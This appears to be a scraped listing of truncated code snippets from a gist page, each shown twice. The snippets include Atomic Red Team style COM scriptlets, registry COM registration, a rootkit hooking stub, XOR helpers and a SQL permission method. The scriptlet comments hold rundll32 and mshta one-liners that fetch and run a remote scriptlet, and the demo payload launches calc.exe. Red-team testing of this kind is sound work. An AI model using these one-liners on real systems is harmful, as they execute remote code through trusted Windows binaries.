2010phenix

## scriptlet.sct
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[

	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

## getmyip.go
package main

/*
Usage of ./getmyip --get_ip=(external|internal)

URL: http://myexternalip.com/#golang
URL: http://changsijay.com/2013/07/28/golang-get-ip-address/

*/

## AtomicRedTeam.sct
<?XML version="1.0"?>
<scriptlet>

<registration
    description="AtomicRedTeam"
    progid="AtomicRedTeam"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
	>

## Injectable.cpp
#include <windows.h>
#include <stdio.h>


FARPROC fpCreateProcessW;
BYTE bSavedByte;

// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe

## winlogon.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]

## decrypt.c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

#define N	256

uint8_t *msg;
uint32_t size;

## xor.c
#include <stdio.h>
#include <memory.h>
#include <stdlib.h>

#define LENGTH 5

void xor(char const value1[LENGTH], char const value2[LENGTH], char *xored[LENGTH]) {
  for(int i=0; i<LENGTH; ++i) {
    xored[i] = (char)(value1[i] ^ value2[i]);
  }

## xor.c
/*
 * gcc -std=gnu99 -O2 -s -o otp otp.c
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>

#include <sys/stat.h>

## secret.c
// Secret
// António Pedro Cunha, 2012
//
// compile with gcc -std=c99 -o secret secret.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <inttypes.h>

## AddPermissionAuthenticatedUsersCreateDb.cs
/// <summary>
        /// Adds Create Database permission for the built-in Windows Authenticated Users group if it can.
        /// </summary>
        public static void AddPermissionAuthenticatedUsersCreateDb(string Server)
        {
            Log.Trace($"Trying to add create database permission for authenticated users group on server: {Server}");
            string SqlcmdLogFile = @"${specialfolder:CommonApplicationData}\" +
                Application.CompanyName + @"\" +
                Application.ProductName + @"\" +
                @"Data\SqlCmd.log";
	<?XML version="1.0"?>
	<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
	<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
	<scriptlet>
	<public>
	</public>
	<script language="JScript">
	<![CDATA[

	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
	package main

	/*
	Usage of ./getmyip --get_ip=(external\|internal)

	URL: http://myexternalip.com/#golang
	URL: http://changsijay.com/2013/07/28/golang-get-ip-address/

	*/
	<?XML version="1.0"?>
	<scriptlet>

	<registration
	description="AtomicRedTeam"
	progid="AtomicRedTeam"
	version="1.00"
	classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	remotable="true"
	>
	#include <windows.h>
	#include <stdio.h>


	FARPROC fpCreateProcessW;
	BYTE bSavedByte;

	// Blog Post Here:
	// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
	// tasklist \| findstr explore.exe
	Windows Registry Editor Version 5.00
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
	@="AtomicRedTeam"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
	@="{00000001-0000-0000-0000-0000FEEDACDC}"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
	@="AtomicRedTeam"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
	@="{00000001-0000-0000-0000-0000FEEDACDC}"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
	#include <stdio.h>
	#include <stdlib.h>
	#include <stdint.h>
	#include <string.h>

	#define N 256

	uint8_t *msg;
	uint32_t size;
	#include <stdio.h>
	#include <memory.h>
	#include <stdlib.h>

	#define LENGTH 5

	void xor(char const value1[LENGTH], char const value2[LENGTH], char *xored[LENGTH]) {
	for(int i=0; i<LENGTH; ++i) {
	xored[i] = (char)(value1[i] ^ value2[i]);
	}
	/*
	* gcc -std=gnu99 -O2 -s -o otp otp.c
	*/
	#include <errno.h>
	#include <stdio.h>
	#include <stdlib.h>
	#include <fcntl.h>
	#include <unistd.h>

	#include <sys/stat.h>
	// Secret
	// António Pedro Cunha, 2012
	//
	// compile with gcc -std=c99 -o secret secret.c

	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <inttypes.h>
	/// <summary>
	/// Adds Create Database permission for the built-in Windows Authenticated Users group if it can.
	/// </summary>
	public static void AddPermissionAuthenticatedUsersCreateDb(string Server)
	{
	Log.Trace($"Trying to add create database permission for authenticated users group on server: {Server}");
	string SqlcmdLogFile = @"${specialfolder:CommonApplicationData}\" +
	Application.CompanyName + @"\" +
	Application.ProductName + @"\" +
	@"Data\SqlCmd.log";